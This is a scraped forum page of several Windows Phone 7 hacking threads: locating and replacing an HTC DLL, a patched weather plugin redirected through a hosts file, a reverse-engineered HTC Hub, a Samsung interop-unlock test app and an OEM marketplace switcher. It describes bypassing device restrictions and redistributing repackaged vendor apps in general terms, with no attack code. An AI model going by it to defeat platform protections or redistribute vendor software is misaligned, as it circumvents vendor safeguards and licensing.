[Q] Anyone knows the install path of HTC Connection Setup? - Windows Phone 7 Development and Hacking

I just need the location of HTC_ConnectionSetup.dll to do some experiment.
But I don't have interop-unlocked HTC device. (This is also what I'm trying to do)
Can someone with interop-unlocked device share the path?
Thanks in advance.

hi, you can not get HTC_ConnectionSetup.xap from marketplace now.
the only way is to get the Original ROM for your device,and the ConnectionSetup in the Rom.

\Applications\Install\5EDBDBBC-2AB2-DF11-8A2F-00237DE2DB9E\Install\HTC_ConnectionSetup.dll
Best of luck to you! If you need somebody to test something, let me know.
You're welcome!

Thanks you guys. My first experiment failed.
Here is what I tried.
- Make a fake HTC_ConnectionSetup.dll, it does write to the registry
- Replace HTC_ConnectionSetup.dll with the faked one
- Launch. Screen went black, then program exists
So, as Heathcliff74 pointed out, the faked HTC_ConnectionSetup.dll is not part of Connection Setup app any more, so the OS simply refuse to execute it.
Going to find some other exploits.

You also may have gotten the namespaces not perfectly right. I've had that happen when I change a DLL or app namespace inside one of my own apps (instead of replacing another one).
However, the fact that Connection Setup is a marketplace app and therefore signed (which allows it to use ID_CAP_INTEROPERVICES even without interop-unlock) may be stopping you too. If the signature is verified each time the app is launched (completely reasonable), then modifying any of the app's binaries won't work.

I'll double check the namespace. I remember I put the correct one.
But, as I've messed up Connection Setup too much, and it is no longer available on marketplace, I'm going to try hacking another HTC app.

Related

HTC Homeplug Weather fix - get your LOCAL weather! [New universal patch uploaded!]

THIS SERVER HAS NOW BEEN DEACTIVATED - See below / my final post
WARNING! The old IP-based/Pocket Hosts method using my server HAS BEEN DEACTIVATED, as I have had to remove the code in question from the direct IP. This means that selecting the custom weather server purely via the HTC home customizing utilities without installing a patched version of the HTC Home DLL, it WILL NOT WORK and you will just get "unable to retrieve data" messages. If this is the case, please uninstall your existing HTC Home plugin, and use one of the ones off the download page.
You can, if necessary, set up your own IP address to base it on, if you can't use my system for some reason, and use the pocket host method that way (requires your own server). Otherwise, please use the cabs below.
NEW! UNIVERSAL PATCH PACKAGE
I've written a universal patcher, so people can now get the HTC Home package they want, and just patch the HTCHome.dll from \WINDOWS. Simply get the package, unzip, drop your HTCHome.dll file in the N2A-Patcher folder, and run the n2a-patcher script inside. It'll magically create you a package! (This won't work for DLLs which people have already patched, you need to use the unmodified original.) This should negate the need for me to create individual packages anymore. Feedback welcome! As a result, I won't be releasing any more complete packages - just install your personal favorite, get the \WINDOWS\HTCHome.dll from your device, drop it in the packager, and let it do it's magic, then install the newly created cab.
Coming soon, if I can figure it out - drop the installer in, and get a patched full installer out! Of course, I have to figure out how to batch extract the cabfile correctly first... *laughs*
I've also just created a DLL to CAB packager (so you can drop your own pre-patched DLL in, and it'll turn it into a ready-to-install cabfile), and a DLL patcher (which just patches the DLL itself, ready for cooking etc - perfect for all you flashers out there!) - all on the download page.
PLEASE DON'T PM ME ABOUT THIS - KEEP IT TO THE THREAD UNLESS I SPECIFICALLY REQUEST A PM OR PM YOU!
Help Request
If anyone has an unpatched Sprint Touch XML file, I could do with a backup copy, for those who corrupt their XML files...
If you've got a Touch, Kaiser/TyTN II or Sprint Touch...
There are specific device DLL replacement packages on the new file download page.
NEW DOWNLOAD AND INSTRUCTION SITE
I've moved all the downloads and instructions to a new page, which will hopefully make it clearer on what people need to download. It also contains full instructions on hexediting the DLL if you wish, and re-signing. I'm not entirely sure if it's more readable or not, but it's certainly more manageable! Feedback welcome. There's some specific overlays now for certain versions of the ROMs too.
FAQ:
Can I install colour customisations to this?
Sure. Take a look around the forum. There's plenty of guides elsewhere.
What does this do?
It reroutes the request to the AccuWeather server to my server instead, which then requests the appropriate data from the AccuWeather server, and translates it into the HTC Weather XML format.
Can I run this via my own server?
Yup. It's running on mine via PHP 5.2.x, using the SimpleXML extension. The code is downloadable from the main download page, and I've even commented it. Once you get it running, you'll need to hexedit the HTCHome.dll file in the same way as described for the ROM chefs. I'd recommend keeping the same length of file for replacement - using directories to pad it out if necessary - it could cause unpredictable results otherwise.
Do I need to run my own server to get my local weather?
Nope, feel free to use mine.
Your server isn't working!
Oops. It's a rarity, but occasionally network outages happen. The server won't be disappearing anytime soon though without any warning! I'm sorry to say that I'll be taking the server down for this shortly as I'm wrapping up my web hosting business and transferring it to another company, but quite a few other people seem to have hosted a copy if people still need it. I hope it's been of use over the years everyone!
Why have you done this?
It was really annoying me that I could only get the weather for a city 25 miles away, that had nothing to do with mine.
Can you make me an XML file for such-a-place?
No, I've done enough already, and it's documented fairly heavily above. If you can't follow instructions, give up and stop trying to hack your phone. I'm not here to hold your hand. I'll help fix bugs and obvious issues, but if you can't edit a textfile, you're on your own.
Release Notes
I've stripped most local data from the return info apart from the town/city and country, but the HTC plugin seems to ignore that anyway. Works for all international locations I've tested. I welcome feedback on anything that's not working though, and I'll try to get it nailed pretty quickly. As said above, also works on zip codes, which will make it easier for our US friends on here.
New release fixes countries that weren't in the list, by removing the country checks altogether - I'm confident it'll "just work" - in theory Report bugs in the usual way.
Known Issues
The WM5 version will NOT update over GPRS/3G, unless you are using an AKU3.3 ROM. WM5 Weather update over GPRS has been proven with Wizard AKU3.3 (like the T-Mobile or WM5SEr5). Other devices/ROM's still to be confirmed.
The temperature in Farhenheit can occasionally be a degree or two out, as I convert from the Celsius scale. To get both readings would mean two calls to the server, which would be more work and bandwidth for my server. I'm sure you can live with a degree out occasionally.
Kudos
Thanks PAPPL for the info on signing files, Schen for his great work on the plugin, and to all those who contributed to getting these plugins (and getting them working!) in the first place!
Enjoy!
As I've taken the server down, I've attached all the relevant files to this post. If someone does want to provide somewhere to point the weather.not2advanced.com domain to, I still own the domain and can add the appropriate A address to it for the purpose if they want to continue hosting for the many users that still seem to be using this plugin. Sorry I had to take it down, but I no longer run the hosting operation this was being held on, and it can be a bit heavy on resources at times.
- Rick
Wow, sounds like a lot of work went into this.
Do you think it would be possible, using this framework, to pull data from the NWS website instead of Accuweather?
Theroetically, I could, providing they set up an appropriate XML feed. However, I can only do one such setup per IP address (and the IP addresses I have are somewhat limited), but if someone wanted to set it up, I've no doubt it'd be possible. However, it wouldn't be trivial - I've had to manually grab bits of data from the XML and process it into the format the home plugin expects. As a UK resident, the NWS isn't huge amounts of use to me
On a more technical note though, it'd require a similar format - at least 5 days in advance for a particular area, and the exact parameters (or something that can be adjusted / mangled / processed into the exact parameters) that the plugin needs. (Take a look at the code in the zipfile if you want to see how much of a pain in the neck THAT was!) Adapting it would also need a complete conversion matrix, or a hacky method using (say) the RSS feed ID for the BBC, or however the NWS does it.
Will this work for cingular/att customer?
If it works already for the major cities, then it'll work the same way, but with more localised weather available.
If you're having trouble with the normal weather plugin setup though, you may still have trouble. Then again, it might work! I've no idea. Try it and find out
Yeeaah
Hi N2A / Rick.
Great job - really! I can't thank you enough.
It finally works for me.
Thanks
HTC Homeplug Weather
Hello,
Thanks for sharing your great work. (I am french so sorry for my poor english)
However, I working on HTC Homeplug Weather because it wont let me download weather forecast when I am using 3G connection.
It works great when I an using wifi connection so I think it is coming from the proxy of vodaphone France (SFR) wich is blocking the access. So I was wondering if I will be able to connect to your server ? (for the moment it is not working) or redirecting the plugin to my tunnel...
Second is there a way to be sure that htc weather plugin is trying to connect to htc.accuweather.com and not to another web site.
Thanks in advance
A french guy wich is also living in a small city and wishto have his weather forecast ;-)
TorbenKB said:
Hi N2A / Rick.
Great job - really! I can't thank you enough.
It finally works for me.
Thanks
Click to expand...
Click to collapse
You're most welcome Glad I could help.
gdbtg said:
Hello,
However, I working on HTC Homeplug Weather because it wont let me download weather forecast when I am using 3G connection.
It works great when I an using wifi connection so I think it is coming from the proxy of vodaphone France (SFR) wich is blocking the access. So I was wondering if I will be able to connect to your server ? (for the moment it is not working) or redirecting the plugin to my tunnel...
Second is there a way to be sure that htc weather plugin is trying to connect to htc.accuweather.com and not to another web site.
Thanks in advance
A french guy wich is also living in a small city and wishto have his weather forecast ;-)
Click to expand...
Click to collapse
Well, if it's the HTC accuweather site specifically blocked, then it will help you. If it's generically blocking sites, then it won't.
Re a tunnel - depends what you mean by it.
The HTC home plugin *always* tries to connect to htc.accuweather.com - hence the host file change, which diverts it to my server instead, which provides the correct data. (NO LONGER APPLIES WITH NEW PLUGINS!)
However, if it's still not working with the hosts file modification (may require soft reset, not sure!), then I'm afraid there's not a lot I can do, unless you can tunnel it as you said, but it depends on what you're using to tunnel.
HTC Homeplug Weather
Thanks for your quick answer !
It's still not worling ;-(
But I wondering how can I test if Pockets Hosts is redirecting properly the htc weather address.
Sincerely
gdbtg said:
Thanks for your quick answer !
It's still not worling ;-(
But I wondering how can I test if Pockets Hosts is redirecting properly the htc weather address.
Sincerely
Click to expand...
Click to collapse
***************** REMOVED OLD CONTENT, NO LONGER APPLIES WITH THE NEW PLUGINS *****************
HTC Homeplug Weather
Ok, I have got the web site and not the error message.
So there is something wrong.
Thanks for your help.
Befor I can try your nice work, I have a problem with the write protection of the hh_0407_weather... file. I dont get my own file in the folder. I tried some things but it didnt work.
Can you help me? I'm runing a B&B v3.7 Ger beta.
Thanks
gdbtg said:
Ok, I have got the web site and not the error message.
So there is something wrong.
Thanks for your help.
Click to expand...
Click to collapse
Reload pocket hosts - it should look something like the attached thumbnail. If it does, try a soft reset. However, if it's still refusing point blank, it's highly possible you're going via a proxy, and that is handling the DNS lookups. To bypass that will require a hack to the HTC plugin itself. I can set it up server side for it (which was going to be my initial approach!), but it'll need an appropriate hostname hacking into the binary. I'll see what I can do on that score tomorrow, both on the home plugin front and the server-side setup.
smallgermanboy said:
Befor I can try your nice work, I have a problem with the write protection of the hh_0407_weather... file. I dont get my own file in the folder. I tried some things but it didnt work.
Can you help me? I'm runing a B&B v3.7 Ger beta.
Thanks
Click to expand...
Click to collapse
I suggest using Total Commander - you can remove the read-only flag from there, and even edit it inside it. Works beautifully.
I use the Total Com, too. But when I open the file the Internet Explorer opens and displays the xml file. I tried to remove the flag but he didnt adopt it. So I looked at the attributes again and nothing has changed.
smallgermanboy said:
I use the Total Com, too. But when I open the file the Internet Explorer opens and displays the xml file. I tried to remove the flag but he didnt adopt it. So I looked at the attributes again nothing has changed.
Click to expand...
Click to collapse
I'm assuming that's after you've gone to the file properties. You should be able to unclick "Read-only" and "System" on it.
There's quite a bit of information on doing this scattered around the forums. Is it cooked into your ROM? (It'll have a tickbox by the "In ROM" box if that's the case.) But you want to clear the Read Only and System attributes from the file properties if you can, THEN edit it.
More information on this thread.
N2A said:
I'm assuming that's after you've gone to the file properties. You should be able to unclick "Read-only" and "System" on it.
Click to expand...
Click to collapse
I did this but when I open the properties again the attributes for "Read-only" and "System" are still on.
There's quite a bit of information on doing this scattered around the forums. Is it cooked into your ROM? (It'll have a tickbox by the "In ROM" box if that's the case.) But you want to clear the Read Only and System attributes from the file properties if you can, THEN edit it.
Click to expand...
Click to collapse
Its in the ROM.
There's your problem. I suggest copying it somewhere else on the device, editing it, and copying it back, but it may have issues doing it.
If you can't copy it back, apparently Resco Explorer is able to do it.
I used resco to do it. you have 14 days free trial so you can test it first.
http://www.resco.net/pocketpc/explorer/downloads.asp
And thanks N2A this is realy great. And works perfectly can find all the small places in Norway
ialu said:
I used resco to do it. you have 14 days free trial so you can test it first.
http://www.resco.net/pocketpc/explorer/downloads.asp
And thanks N2A this is realy great. And works perfectly can find all the small places in Norway
Click to expand...
Click to collapse
Thanks for both
I copied it with the resco and now it works perfekt. I tried several small cities in Germany and he found all. THANKS again
Thanks. works great. now i know it's going to rain all week here in abergavenny

[RELEASE] HTC Hub for everyone!

Hi,
You can download the rar's. They contain the xap. You can use any dev-unlocked device (also non-HTC). This was quite a reversing-adventure. I learned a lot.
A few remarks:
- This is not the latest version of the HTC Hub. It does not have the live-tile. Maybe I'll update later.
- I had to rewrite some parts of the code. It all works 100% but I think it can be done better, so maybe I'll update that later.
- Note the about screen
Word! It works but it still *****es about not being able to reach HTC's service. Great job regardless Heathcliff.
EDIT: The wild thing about it is, I can actually reach into HTC's section of the Marketplace through this app. That's crazy.
want to try
but I am getting errors unzipping with 7zip, what is the way you guys are successful with?
Heathcliff74 said:
Hi,
You can download the rar's. It contains the xap. You can use any dev-unlocked device (also non-HTC). This was quite a reversing-adventure. I learned a lot.
A few remarks:
- This is not the latest version of the HTC Hub. It does not have the live-tile. Maybe I'll update later.
- I had to rewrite some parts of the code. It all works 100% but I think it can be done better, so maybe I'll update that later.
- Note the about screen
Click to expand...
Click to collapse
Good work. Works on my Omnia7, the graphics look like sh*t though on my lovely screen
I don't get any errors or anything here - weather/time/location all work great. As fb401 says - you can access the HTC Marketplace, but you can access any Marketplace app as long as you know the ProductID.
Does access to the other apps from the marketplace on the phone allow use of the excellent HTC flashlight app or any additional HTC apps?
fb401 said:
Word! It works but it still *****es about not being able to reach HTC's service. Great job regardless Heathcliff.
EDIT: The wild thing about it is, I can actually reach into HTC's section of the Marketplace through this app. That's crazy.
Click to expand...
Click to collapse
Anyone having the message about not being able to reach the HTC server, plz verify that you have either Wifi or cellular connection and try refresh-button. It definitely works.
buffalosolja42 said:
but I am getting errors unzipping with 7zip, what is the way you guys are successful with?
Click to expand...
Click to collapse
Download both parts in the same folder and use WinRar.
jessej said:
Does access to the other apps from the marketplace on the phone allow use of the excellent HTC flashlight app or any additional HTC apps?
Click to expand...
Click to collapse
No, it won't work. You can try to install, but the program will try to use the HTC drivers and hardware, and it will quit. These programs need (a lot of) work to get running on other devices. Look here and here.
Heathcliff74 said:
Anyone having the message about not being able to reach the HTC server, plz verify that you have either Wifi or cellular connection and try refresh-button. It definitely works.
Click to expand...
Click to collapse
I was still plugged into my laptop in airplane mode. When I disconnected and went back, it worked perfectly.
Blade0rz said:
As fb401 says - you can access the HTC Marketplace, but you can access any Marketplace app as long as you know the ProductID.
Click to expand...
Click to collapse
Sure you can, but there's literally no way inside of the HTC walls on my LG phone besides this hub.
getting crc failure from file htchub1
edit*** downloaded on fedora then transferred to vm win7 and looks like file is ok after crc check
well done
thank u
Excellent job, will be bookmarking this thread to see if the live tile gets added. Great work Heathcliff.
Is it possible to get the HTC Connection Setup app to work on a non-HTC phone?
slysy said:
Is it possible to get the HTC Connection Setup app to work on a non-HTC phone?
Click to expand...
Click to collapse
I guess you're asking this to be able to get provxml working. Well, that's not really possible. Because the HTC Connection Setup calls the HTC drivers which will in turn process the provxml. So I would be able to get the HTC Connection Setup running, but it will not be able to call the driver on non-HTC devices. I guess in time we'll find the necessary security holes to get in the TCB chambers to execute these types of code and config files.
The OEM drivers are very usefull, because they provide (limited) access to the high-privilege TCB-chambers. The drivers contain hardware-specific functions and non-hardware-specific functions. Those non-hardware-specific functions (like registry- and file-system-access) are the most interesting for us. The drivers can be called from unmanaged code, which in turn can be called by managed code through a com-interface. But since we have no way to port drivers between devices (yet), those non-hardware-specific functions remain device-specific for now.
Heathcliff74 said:
I guess you're asking this to be able to get provxml working. Well, that's not really possible. Because the HTC Connection Setup calls the HTC drivers which will in turn process the provxml. So I would be able to get the HTC Connection Setup running, but it will not be able to call the driver on non-HTC devices. I guess in time we'll find the necessary security holes to get in the TCB chambers to execute these types of code and config files.
The OEM drivers are very usefull, because they provide (limited) access to the high-privilege TCB-chambers. The drivers contain hardware-specific functions and non-hardware-specific functions. Those non-hardware-specific functions (like registry- and file-system-access) are the most interesting for us. The drivers can be called from unmanaged code, which in turn can be called by managed code through a com-interface. But since we have no way to port drivers between devices (yet), those non-hardware-specific functions remain device-specific for now.
Click to expand...
Click to collapse
Thanks for the response. I asked because the Samsung Connection Setup app doesn't support my network, so I can't configure or use MMS. I know that the HTC Connection Setup app does however, so I want to use it to configure my network settings. Do you think this is possible (I didn't understand everything you said, so sorry if this is a silly question)?
slysy said:
Thanks for the response. I asked because the Samsung Connection Setup app doesn't support my network, so I can't configure or use MMS. I know that the HTC Connection Setup app does however, so I want to use it to configure my network settings. Do you think this is possible (I didn't understand everything you said, so sorry if this is a silly question)?
Click to expand...
Click to collapse
Hmm.. I don't know about that. HTC Connection Setup is not a solution, because you don't have the necessary drivers on your device. Samsung has a set of predefined xml's in the \windows folder. Every country has it's own xml with the settings of the known network operators. There is a trick to configure one of these. Info is in this thread. But I'm not sure if there is an xml on your phone that contains the info for your network operator. Good luck.
Heathcliff74 said:
Hmm.. I don't know about that. HTC Connection Setup is not a solution, because you don't have the necessary drivers on your device. Samsung has a set of predefined xml's in the \windows folder. Every country has it's own xml with the settings of the known network operators. There is a trick to configure one of these. Info is in this thread. But I'm not sure if there is an xml on your phone that contains the info for your network operator. Good luck.
Click to expand...
Click to collapse
wow it works well
now the question is
will the youtube app receive the same treatment?
domineus said:
wow it works well
now the question is
will the youtube app receive the same treatment?
Click to expand...
Click to collapse
Haha. Well, I haven't taken a look at that one. But I can assure you that reversing a Windows Phone Silverlight app is a very complex task. I have done this once, so I could maybe do it again. Depends on how much of the HTC driver has to be rewritten for that app. But I probably won't do that very soon. The truth is that I did this mainly to learn about the inner works of Windows Phone and Silverlight. And I have a couple of other 'projects' I'm working on, so I want to focus on that. Maybe someone else will pick up the task for the Youtube app.
thx Heathcliff74
Heathcliff74
thank u for the hub
do you know any way to add driver to other OEM from htc
long ago i have omnia 2 and we could add some DLL to windows to make compatible with Samsung
do you think to with could be able to play with youtube app from htc i can get him open but i dont have connection
ronalgps said:
do you know any way to add driver to other OEM from htc
Click to expand...
Click to collapse
At this moment we have no way to exchange drivers from different OEMs. Read my post earlier in the thread. Maybe I'll have a look at the Youtube app, but don't count on it. I'm very busy.
Works great on my omnia7!!!! What will happened if i will update hub via marketplace?

[XAP][SOURCE][MANGO] Samsung gen2 interop test app v2

All right folks - several hours later than I wanted to get this out to you, but here it is. Blame my new cat, she's wonderfully distracting.
Requirements:
Samsung generation-2 WP7 device (Focus S or Focus Flash/Omnia 7 S).
Dev-unlocked (ChevronWP7 Labs or AppHub).
Interop-unlocked (yes, it works on your phones).
XAP deployment tool (any).
Helpful:
Screen capture app (good way to report results that are too long to type).
Good software testing skill (mostly, give me info as complete as you can).
A recent backup, if you're worried of damage, unless you're willing to hard reset.
Instructions:
Download the attached ZIP archive.
Extract the XAP file from the Bin\Debug\ folder.
Deploy the XAP to your phone.
Run the app (SamsungTest).
Note the initial message box with your phone name, case sensitive.
Tap the buttons to run tests.
Note the results of each test.
Note any exceptions that occur.
Report the results, including phone name, test output, and exceptions (with context).
Note: The Audio Mute test is a toggle; press it again to switch back. It is the only test that should modify your phone in any way, and should be both minor and easily reverted.
Developers:
The full source code of the app is attached, including the most important file (Samsung2Interop.cs), a helper with many useful constants (SamsungWin32.cs), and the native COM DLLs. You can see how I use the DLLs and how to build your own apps, or modify existing apps, using them.
Thanks sent to the first few people to give useful reports!
SAMSUNG SGH-i937
Wireless: app closes out.
Audio:
"Unexpected exception please report!
System.IO.FileNotFoundException: The system cannot find the file specified as..."
(the above lines are what is cut off from the top of the message in the picture i attached below)
Get IMEI: app closes out
File Listing: "Your documents folder contains these files:" [ok]
Directory List: "Your root directories are:" [ok]
Registry: "Sub-keys of HKEY_CLASSES_ROOT\bmpimage :\n" [ok] (app closes when pressing [ok])
Provxml: "Provxml query output:" [ok]
Well, that's a weird and disappointing result. I figured some might not work, but I didn't expect them all to fail and most certainly didn't expect either the app to crash silently or to get a FileNotFoundException!
OK, I've put together a v2 of the test app. It's got very few test changes, but should help me pinpoint the problem better, I hope...
One request when testing: I'm much more interested in the top of the exception than the bottom of the stack trace, so if you're going to screenshot part of it, go for that part. Thanks!
SAMSUNG SGH-i937
wireless closes app
audio mute screenshot attached
get imei closes app
file listing Your documents folder contains these files: ok
Directory List test Your root directories are: ok
Registry HKEY_CLASSES_ROOT\bmpimage:
Provxml Provxml query output: ok
Gotcha. Will test after class.
Sent from my SGH-i937 using XDA Windows Phone 7 App
---------- Post added at 08:36 AM ---------- Previous post was at 08:17 AM ----------
Went ahead and gave it a try before taking off. If the download file in the first post is the updated test file, then I'm afraid it yields the same results, on every test :-/
Mine was done after you posted about the V2 file also.
Wireless test exits the app
Get IMEI exits the app
The rest go as follows
ManelScout4Life said:
Wireless test exits the app
Get IMEI exits the app
The rest go as follows
Click to expand...
Click to collapse
mine is exactly the same (same phone as well)
OK, I clearly need to investigate this more. It sounds like there's a systemic issue with how I'm accessing this data, although there are a few more tweaks I can make to the test. I'd be interested to get results from the other Samsung phone, the Focus Flash, but I doubt anything escept the first message will be different.
I'll post a new version or two later today. I want to take another look at exactly how the code gets called by the Diag app, just in case there's some weird initialization step or something.
GoodDayToDie said:
OK, I clearly need to investigate this more. It sounds like there's a systemic issue with how I'm accessing this data, although there are a few more tweaks I can make to the test. I'd be interested to get results from the other Samsung phone, the Focus Flash, but I doubt anything escept the first message will be different.
I'll post a new version or two later today. I want to take another look at exactly how the code gets called by the Diag app, just in case there's some weird initialization step or something.
Click to expand...
Click to collapse
I can test it on my new Samsung Omnia W (Focus Flash), but can you explain me how to convert the source in a .XAP?
AdryJay said:
I can test it on my new Samsung Omnia W (Focus Flash), but can you explain me how to convert the source in a .XAP?
Click to expand...
Click to collapse
if you're just trying to test it, the xap is in the folder mentioned in the OP, there's no need to build the xap, as it's done already.
if you want to play with the source and build an alternate xap to test that's another question that i'm sure someone can answer
adiliyo said:
if you're just trying to test it, the xap is in the folder mentioned in the OP, there's no need to build the xap, as it's done already.
if you want to play with the source and build an alternate xap to test that's another question that i'm sure someone can answer
Click to expand...
Click to collapse
Found it...
SAMSUNG GT-I8350
Wirless Test: The app crashed.
Audio Mute Test: Unexpected exception, please report!
System.IO.FileNotFoundException: The system cannot find the file specified.
at
SamsungTest.MainPage.TestAudioMute()
at
SamsungTest.MainPage.TestAudioMute_Click
(Objcet sender, RoutedEventArgs e)
at
System.Windows.Controls.Primitives.ButtonBase.OnClick()
at
System.Windows.Controls.Button.OnClick()
at
System.Windows.Controls.Primitives.ButtonBase.OnMouseLeftButtonUp
(MouseButtonEvent Args e)
at
System.Windows.Controls.Control.OnMouseLeftButtonUp(Control ctrl, EventArgs e)
at MS.Internal.JoltHelper.FireEvent(IntPtr
unmanagedObj, IntPtr
unmanagedObjArgs, Int32 argsTypeIndex,
Int32 actualArgsTypeIndex, String
eventName)
Then it crashed.
Get IMEI Test: The app crashed.
File Listing Test: Your documents folder contains these files: OK
Directory List Test: Your root directories are: OK
Registry Test: Sub-keys of HKEY_CLASSES_ROOT\bmpimage : OK
Then the app crashed.
Provxml Test: Provxml query output: OK
Hope this help you... ^^
Well, it confirmed two things: the string I can use to identify the Focus Flash, and that the problem with the app is not specific to the Focus S. At this point, that's almost more reassuring than if it had worked, since at least that means there aren't per-phone differences.
GoodDayToDie said:
Well, it confirmed two things: the string I can use to identify the Focus Flash, and that the problem with the app is not specific to the Focus S. At this point, that's almost more reassuring than if it had worked, since at least that means there aren't per-phone differences.
Click to expand...
Click to collapse
Do you have a Focus Flash/S to play with, GDTD?
I believe the reason why we're having issues is that Samsung changed the driver DLLs, which would mean we would need to find a XAP from the Marketplace that has references to the gen2 DLLs. Or am I missing something?
@Jaxbot: No I don't, which is why I created this thread; I needed testing from people who do.
Your guess is exactly correct. I've already got a few interop-enabled XAPs from various helpful people with gen2 phones (some come from marketplace, some from the \Windows folder using the webserver app). I've decompiled them enough (I thought) to re-package the COM DLLs they use for homebrew use. However, it's not working, and is throwing some really weird errors (the "FileNotFound" one is bizarre, the simple crashing almost worse). So, I'm digging deeper and trying to figure out why. Worst case, I disassemble/decompile the native COM DLLs nd try to figure them out. That'll take a while - I can read (some) ARM assembly and C++, but even if the decompiler does a good job it's still going to be slow work - so I'm hoping it doesn't come to that. Managed code is usually easier to reverse engineer.
I have a Samsung Focus Flash with interop unlocked and ICS working.
Im not sure what this xap test is for. Can anyone please fill me in so that I may be able to help.
Thanks!
GoodDayToDie said:
@Jaxbot: No I don't, which is why I created this thread; I needed testing from people who do.
Your guess is exactly correct. I've already got a few interop-enabled XAPs from various helpful people with gen2 phones (some come from marketplace, some from the \Windows folder using the webserver app). I've decompiled them enough (I thought) to re-package the COM DLLs they use for homebrew use. However, it's not working, and is throwing some really weird errors (the "FileNotFound" one is bizarre, the simple crashing almost worse). So, I'm digging deeper and trying to figure out why. Worst case, I disassemble/decompile the native COM DLLs nd try to figure them out. That'll take a while - I can read (some) ARM assembly and C++, but even if the decompiler does a good job it's still going to be slow work - so I'm hoping it doesn't come to that. Managed code is usually easier to reverse engineer.
Click to expand...
Click to collapse
Of course managed code is easier to reverse engineer..you can get the actual source back =P
Anyway, I'd help out, but I don't have a Flash or S either... It's certainly possible, but not without a lot of tinkering.
I wonder if Samsung did this intentionally to screw with us, or if it's just a coincidence (new drivers, etc).
wsantiagow said:
I have a Samsung Focus Flash with interop unlocked and ICS working.
Im not sure what this xap test is for. Can anyone please fill me in so that I may be able to help.
Thanks!
Click to expand...
Click to collapse
Just read the thread man, it's two pages long.
Any news about the development?
Sorry man, got wrapped up in trying to interop-unlock Nokia and then HTC phones, and haven't gotten back to this app yet. It's on my mind, don't worry - there's just only so many things I can do in a day, especially when Minecraft release just came out.
I'll try to have a new version shortly after Thanksgiving. I've got a pretty good idea now what's wrong, but I have to figure out how to work around it.

[XAP][ZIP] Access OEM Marketplaces easily, no dev unlock! (Update 16 Aug 2013)

Hi hackers!
Found something pretty cool while I was digging around looking for new interop-unlock hacks. The bad news is that it looks like it's not usable for interop unlock, the good news is that it's still pretty cool.
This previously required a dev-unlock, but no longer does. It does not require interop-unlock. It works on all phones (as far as I know).
UPDATE 3: ZIP file usable on non-unlocked phones EDIT: I think this will not work on most phones. Sorry! The XAPs still work, if you can sideload them
I've added a ZIP file that can be used to switch the OEM Marketplace without needing to sideload a XAP at all. Instructions are inside, but basically you tap the XML file for the OEM you want, then reboot the phone.
UPDATE 2: Dell Apps.xap, Nokia Apps.xap (v2)
The Dell apps collection is hidden, like the Nokia one was (see Update 1 below). The only app I was able to find was "Newsroom" (another app kind of like HTC Hub). If there are others, please let me know and I'll try to find them.
Nokia has collected their apps into a single marketplace section, like HTC/Samsung/LG. The new Nokia Apps.xap reflects this, so disregard the Update 1 note below for Nokia, and download the new XAP!
UPDATE 1: Nokia Apps.xap (See the Update 2 note - Nokia Apps.xap has been changed)
Be aware that this app works a little differently. Rather than actually adding a "Nokia" store to your Marketplace list, it just enables your phone to access Nokia's apps though the normal marketplace. Not sure why some OEMs did their own store and others didn't, but that's why it wasn't working before (it isn't a stand-alone store section).
An easy way to find the Nokia apps is to do a seach for a well-known app, like Nokia Maps. Then, open it and tap the "More from Nokia Corporation" link. This will take you to a list of all of Nokia's apps.
WHAT IS IT?
Install a XAP or tap an XML file in the ZIP, and restart your phone. Then, open the marketplace, and you'll discover that, instead of "HTC Apps" or "Samsung Zone" or whatever your default is, you can install OEM apps from a different OEM.
WHAT CAN I DO?
If you want to install Nokia, HTC, Samsung, LG, or Dell apps, open the ZIP file on your phone, look for the OEM name you want, and tap the XML file immediately under that OEM name. You'll need to restart your phone before the Marketplace changes.
If you want to help out, give me as much info as you can about the other OEM marketplaces (Toshiba/Fujitsu, perhaps?)
IS IT DANGEROUS?
Well, it's a hack. There's always *some* danger. However, you don't need to worry very much. The phone will automatically revert the Marketplace after a day or so. You can also get your proper marketplace back by installing the corresponding app/tapping the desired ZIP.
However, you *really* should keep an up-to-date restore point any time you're messing with stuff like that, especially with new hacks. If something screws up and doesn't straighten out, restore a backup or hard-reset and it will fix itself.
EDIT: The ZIP does not appear to work on most phones. The XAP files should still work on 7.8, though.
WHO CAN I THANK?
Well, aside from myself thanks go to:
Heathcliff74, for the XAP deployer hack and the Samsung marketplace configuration file.
Schaps, for TouchXplorer (let me find the relevant file).
Voluptuary, for info about both OEM and MO marketplaces (working on those).
wpxbox, for the info about "Nokia collection".
CAN I ASK A QUESTION?
You just did, or at least, I did for you. Please see the next post after this one for FAQ. Otherwise, feel free to post a reply with your question. Please, if it's at all relevant, include the make, model, and version of your phone and OS/firmware.
OK, I know you all will have some questions. I'll try to collect them, and their answers, here so people don't have to read every post.
If you ask a question that is already answered here, I may facepalm and/or use sarcasm.
DO I NEED TO RUN THIS APP?
No, you don't. It doesn't do anything at all after installing. In fact, I re-used another app that I had handy, so the message you see isn't even accurate!
WHY DOES THE MESSAGE IN THE APP TALK ABOUT INTEROP UNLOCK? CAN I USE THIS APP FOR INTEROP UNLOCK?
It talks about it because I reused in interop-unlock app (which works exactly the same way, but with a different file). This app will not interop-unlock your phone, or even allow you to do so. However, it doesn't need interop-unlock, either. Furthermore, why are you running the app? You don't need to; none of the instructions say to run it.
CAN I DELETE THE APP?
Yes. Once it's installed, you can delete it immediately if you want to.
HOW DO I GET MY OWN OEM'S MARKETPLACE BACK?
You can either install the corresponding XAP and reboot, or you can wait a day or so for the phone to recover on its own.
HOW CAN I GET BACK TO AN OEM MARKETPLACE THAT I ACCESSED BEFORE?
Remove the app (and any variant of it), if it's currently installed. Then, install it again. Then, reboot as before, and you should see the marketplace corresponding to whatever XAP you used.
WHY DON'T ALL APPS WORK?
Many apps will use native drivers to do their work. These drivers are specific to each OEM's firmware, and are baked into the ROM. Apps that don't need special permissions, like the Samsung Now app or LG's Look n Type, should work. Apps that have high permissions or do device-specific things, like a Network Profile app or HTC Sound Enhancer (if it ever appears again) won't work on other phones.
SOME OF THESE APPS HAVE ID_CAP_INTEROPSERVICES, CAN WE USE THEM FOR INTEROP UNLOCK?
No. The apps may appear to work (even on interop-locked phones) because they were installed from the Marketplace and have valid signatures. However, they won't actually be able to do anything useful, because the wrong drivers will be installed (see the previous question).
CAN YOU ADD A XAP FOR ANOTHER MARKETPLACE?
Sure, once the required configuration data is available. This can be tricky - for example, the values for HTC and Samsung are "HTC" and "Samsung", respectively, but the one for LG is actually "LGE" (LG Electronics). I don't know what they are for Toshiba/Fujitsu, and I'm not sure I have everything from Dell, and I don't have any others. Any help here would be appreciated!
